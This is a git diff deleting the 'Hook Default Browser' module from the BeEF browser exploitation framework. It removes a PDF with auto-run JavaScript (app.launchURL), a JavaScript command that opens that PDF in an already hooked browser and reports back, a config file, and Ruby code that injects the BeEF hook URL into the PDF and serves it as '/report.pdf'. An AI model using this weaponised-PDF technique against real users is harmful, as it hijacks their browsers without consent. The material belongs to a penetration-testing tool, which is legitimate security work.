diff --git a/modules/browser/hook_ie/bounce_to_ie.pdf b/modules/browser/hook_ie/bounce_to_ie.pdf deleted file mode 100755 index f0230f9a8..000000000 --- a/modules/browser/hook_ie/bounce_to_ie.pdf +++ /dev/null @@ -1,79 +0,0 @@ -%PDF-1.1 -1 0 obj -<< - /Pages 3 0 R - /OpenAction 4 0 R - /Type /Catalog ->> -endobj -2 0 obj -<< - /Encoding /MacRomanEncoding - /Subtype /Type1 - /BaseFont /Helvetica - /Type /Font - /Name /F1 ->> -endobj -3 0 obj -<< - /Kids [ 5 0 R ] - /Type /Pages - /Count 1 ->> -endobj -4 0 obj -<< - /S /JavaScript - /JS 6 0 R ->> -endobj -5 0 obj -<< - /MediaBox [ 0 0 795 842 ] - /Contents 7 0 R - /Parent 3 0 R - /Resources << - /Font << - /F1 2 0 R - >> - /ProcSet [ /PDF /Text ] - >> - /Type /Page ->> -endobj -6 0 obj -<< - /Length 1708 ->>stream -app.launchURL("",true); -endstream -endobj -7 0 obj -<< - /Length 48 ->>stream -BT - -ET -endstream -endobj -xref -0 8 -0000000000 65535 f -0000000010 00000 n -0000000087 00000 n -0000000209 00000 n -0000000278 00000 n -0000000332 00000 n -0000000513 00000 n -0000002278 00000 n -trailer -<< - /Size 8 - /ID [ (11f570958af49b794c95ff1c6be3bac5) (11f570958af49b794c95ff1c6be3bac5) ] - /Root 1 0 R ->> -startxref -2381 -%%EOF diff --git a/modules/browser/hook_ie/command.js b/modules/browser/hook_ie/command.js deleted file mode 100644 index dbae263f2..000000000 --- a/modules/browser/hook_ie/command.js +++ /dev/null @@ -1,22 +0,0 @@ -// -// Copyright 2011 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { - - var pdf_url = '/report.pdf'; - window.open( pdf_url, '_blank'); - - beef.net.send('<%= @command_url %>', <%= @command_id %>, "Attempted to open PDF in default browser."); -}); diff --git a/modules/browser/hook_ie/config.yaml b/modules/browser/hook_ie/config.yaml deleted file mode 100644 index 30afe8e51..000000000 --- a/modules/browser/hook_ie/config.yaml +++ /dev/null @@ -1,25 +0,0 @@ -# -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -beef: - module: - hook_ie: - enable: true - category: "Browser" - name: "Hook Default Browser" - description: "This module will use a PDF to attempt to hook the default browser (assuming it isn't currently hooked).

Normally, this will be IE but it will also work when Chrome is set to the default. When executed, the hooked browser will load a PDF and use that to start the default browser. If successful another browser will appear in the browser tree." - authors: ["saafan"] - target: - working: ["All"] diff --git a/modules/browser/hook_ie/module.rb b/modules/browser/hook_ie/module.rb deleted file mode 100644 index e44a4bb24..000000000 --- a/modules/browser/hook_ie/module.rb +++ /dev/null @@ -1,58 +0,0 @@ -# -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# - -class Hook_ie < BeEF::Core::Command - - def pre_send - #Get the servers configurations. - configuration = BeEF::Core::Configuration.instance - - #The hook url to be replace the token in the original pdf file. - hook_uri = "http://#{configuration.get("beef.http.dns")}:#{configuration.get("beef.http.port")}/demos/report.html" - - # A new pdf file containg the actual hook URI instead of the dummy token. - configured_hook_file = File.open("./modules/browser/hook_ie/bounce_to_ie_configured.pdf","w") - - # The original pdf file contains a token that will get replaced during the initialization with - # the actual hook URI of beef. Note that the hook URI is accessed via the DNS name. - File.open('./modules/browser/hook_ie/bounce_to_ie.pdf',"r") { |original_hook_file| - original_hook_file.each_line { |line| - # If the line includes the hook token, then replace it with the actual hook URI - if(line.include? '') - line = line.sub(//, hook_uri) - end - #write the line to a new file - configured_hook_file.write(line) - } - } - - configured_hook_file.close() - - - #Bind the configured PDF file to the web server. - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/hook_ie/bounce_to_ie_configured.pdf', '/report', 'pdf', -1); - - end - - def post_execute - content = {} - content['result'] = @datastore['result'] - - save content - #update_zombie! - end - -end